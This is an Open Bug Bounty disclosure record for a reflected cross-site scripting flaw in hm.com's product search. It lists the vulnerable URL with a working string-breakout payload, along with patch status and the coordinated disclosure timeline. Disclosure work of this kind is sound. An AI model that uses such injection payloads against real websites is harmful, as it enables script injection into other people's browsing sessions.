hm.com XSS vulnerability

2016-02-25T03:46:00
ID OBB:137763
Type openbugbounty
Reporter jimcola99
Modified 2016-12-24T01:02:00

Description

Vulnerable URL:
http://www.hm.com/us/products/search?term=aids%27;confirm(%27xssposed%27);var%20f=%27
Details:

Description| Value
---|---
Patched:| Yes, at 23.12.2016
Latest check for patch:| 23.12.2016 09:46 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 425
Google Pagerank| 6
VIP website status:| Yes
Check hm.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 25 February, 2016 03:46 GMT
Generic security notifications sent to website owner| 25 February, 2016 03:48 GMT
Notification sent to subscribers (without technical details)| 25 February, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 24 March, 2016 04:11 GMT
Vulnerability patched by the website owner| 24 December, 2016 01:02 GMT